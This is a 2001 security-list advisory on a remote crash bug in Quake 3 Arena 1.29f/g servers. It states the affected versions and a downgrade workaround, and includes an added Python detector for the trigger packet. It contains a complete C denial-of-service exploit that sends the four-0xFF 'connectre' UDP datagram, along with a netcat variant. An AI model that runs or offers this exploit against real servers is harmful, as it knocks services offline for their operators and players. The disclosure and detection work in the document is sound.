[EXPL] Quake 3 Arena Security Vulnerability (CHAR 255, Exploit)

From: support@securiteam.com
To: list@securiteam.com
Subject: [EXPL] Quake 3 Arena Security Vulnerability (CHAR 255, Exploit)
Message-Id: <20010802192836.73E2A13902@mail.der-keiler.de>
Date: Thu,  2 Aug 2001 21:28:36 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Quake 3 Arena Security Vulnerability (CHAR 255, Exploit)
------------------------------------------------------------------------

SUMMARY

Quake 3 Arena allows gamers to fight each other in virtual arenas created
for the Quake game. The server component contains a vulnerability that
allows a remote attacker to crash it.

DETAILS

Vulnerable systems:
Quake 3 Arena version 1.29f
Quake 3 Arena version 1.29g

Immune systems:
Quake 3 Arena version 1.17

A security vulnerability has been found in Quake 3 Arena. The
vulnerability allows an attacker to cause the server to crash.

The vulnerability can be reproduced by initiating a connection to the
server and then sending the following sequence as a single UDP datagram:

\xff\xff\xff\xffconnectre

Where the four leading bytes (rendered in the original mail as "Y with the
dots on them", i.e. the character for byte value 255) are char(255)'s.

Temporary solution:
A quick way to ensure that your server will be up is to revert back to
version 1.17.
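As an added, defender-side example that is not part of the original advisory or its exploit: a small Python inspector that parses Quake 3 out-of-band datagrams and flags only a "connect" command that carries no argument, which is the shape of the trigger described above. The four 0xFF bytes are the standard out-of-band marker on every Quake 3 control packet, so a rule that matched on the prefix plus "connect" alone would flag every real player join; the example therefore assumes (an assumption, not something the advisory states) that a legitimate connect always carries a quoted userinfo string after a space. The sample datagrams and addresses are constructed for this example.

```python
"""Flag Quake 3 out-of-band 'connect' datagrams that carry no userinfo argument."""

# Four char(255) bytes open every Quake 3 out-of-band (connectionless) packet.
OOB_PREFIX = b"\xff\xff\xff\xff"
Q3_PORT = 27960  # default server port named in the advisory


def parse_oob(payload: bytes):
    """Return (command, argument) for an out-of-band packet, or None if it is not one.

    The exploit sends strlen+1 bytes, so a trailing NUL is stripped along with
    line endings before splitting the command from its argument.
    """
    if not payload.startswith(OOB_PREFIX):
        return None
    body = payload[len(OOB_PREFIX):].rstrip(b"\x00\r\n")
    cmd, _, arg = body.partition(b" ")
    return cmd, arg


def is_bare_connect(payload: bytes) -> bool:
    """True for a 'connect' out-of-band command with no argument at all.

    Assumption (not from the advisory): a real client connect is followed by a
    space and a quoted userinfo string, so an argument-less connect is anomalous.
    The token is matched by prefix so the exact "connectre" bytes from the
    advisory are caught as well.
    """
    parsed = parse_oob(payload)
    if parsed is None:
        return False
    cmd, arg = parsed
    return cmd.lower().startswith(b"connect") and arg.strip() == b""


# Constructed sample datagrams as (source, destination port, payload); not captures.
SAMPLE_DATAGRAMS = [
    ("10.0.0.5", 27960, b"\xff\xff\xff\xffgetinfo xxx"),                      # ordinary query
    ("10.0.0.6", 27960, b'\xff\xff\xff\xffconnect "\\protocol\\68\\name\\p"'),  # normal join
    ("10.0.0.7", 27960, b"\xff\xff\xff\xffconnect"),                          # bare connect
    ("10.0.0.8", 27960, b"\xff\xff\xff\xffconnectre\x00"),                    # advisory bytes
    ("10.0.0.9", 53, b"\xff\xff\xff\xffconnect"),                             # not the game port
]


def scan(datagrams, port: int = Q3_PORT):
    """Return the source addresses that sent a bare connect to the server port."""
    return [src for src, dport, payload in datagrams
            if dport == port and is_bare_connect(payload)]


if __name__ == "__main__":
    for src in scan(SAMPLE_DATAGRAMS):
        print(f"bare connect from {src}")
```

The same predicate can be attached to a packet capture or a UDP proxy in front of the server; because it keys on the absence of the argument rather than on the 0xFF prefix, normal joins and server queries pass untouched.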

Exploit:
/* This is a 1.29f and 1.29g Server Exploit for id software's Quake3: Arena.
Basically this connects to the default port 27960 of a server and sends a UDP
packet with a string of Char(255) four times plus connect, all as one word.
This is a working Linux version, simple enough to use: ./fuq3 <hostname>
I am in no way going to continue to work on this; it works, it has done. It is
proven. Therefore, here is the bare minimum. Thanks to ttol and his information,
this was achieved. There is also a working hack that can be done with netcat:
you use netcat with the -u (UDP) option, connect to the host, and then you send
the string.
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* memcpy(), memset(), strlen() */

#define PORTNUMBER 27960 /* change this value to the port desired */

int main(int argc, char *argv[])
{
    int socketDesc;
    struct sockaddr_in destinationAddr;
    struct hostent *hostAddrPtr;
    /* four char(255) bytes followed by the word; the mail rendered them as "????".
       The literal is split so the hex escape does not swallow the following 'c'. */
    char *msgBufPtr = "\xff\xff\xff\xff" "connectre";

    if (argc < 2) {
        fprintf(stderr, "usage: %s <hostname>\n", argv[0]);
        exit(1);
    }

    if ((socketDesc = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
        perror("open error on socket");
        exit(1);
    }

    if ((hostAddrPtr = gethostbyname(argv[1])) == 0) {
        printf("Could not get address of %s\n", argv[1]);
        exit(1);
    }

    memset(&destinationAddr, 0, sizeof(destinationAddr));
    destinationAddr.sin_family = AF_INET;
    memcpy((char *) &destinationAddr.sin_addr.s_addr,
           (char *) hostAddrPtr->h_addr, hostAddrPtr->h_length);
    destinationAddr.sin_port = htons(PORTNUMBER);

    /* send message to socket; strlen+1 includes the terminating NUL byte */
    if (sendto(socketDesc, msgBufPtr, strlen(msgBufPtr)+1, 0,
               (struct sockaddr *)&destinationAddr, sizeof(destinationAddr)) < 0) {
        perror("socket send error");
        exit(1);
    }

    printf("Seg Fault on %s...\n", argv[1]);
    return 0;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:drttol@hotmail.com> The Tree
of Life and <mailto:defrag@nyct.net> defrag.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.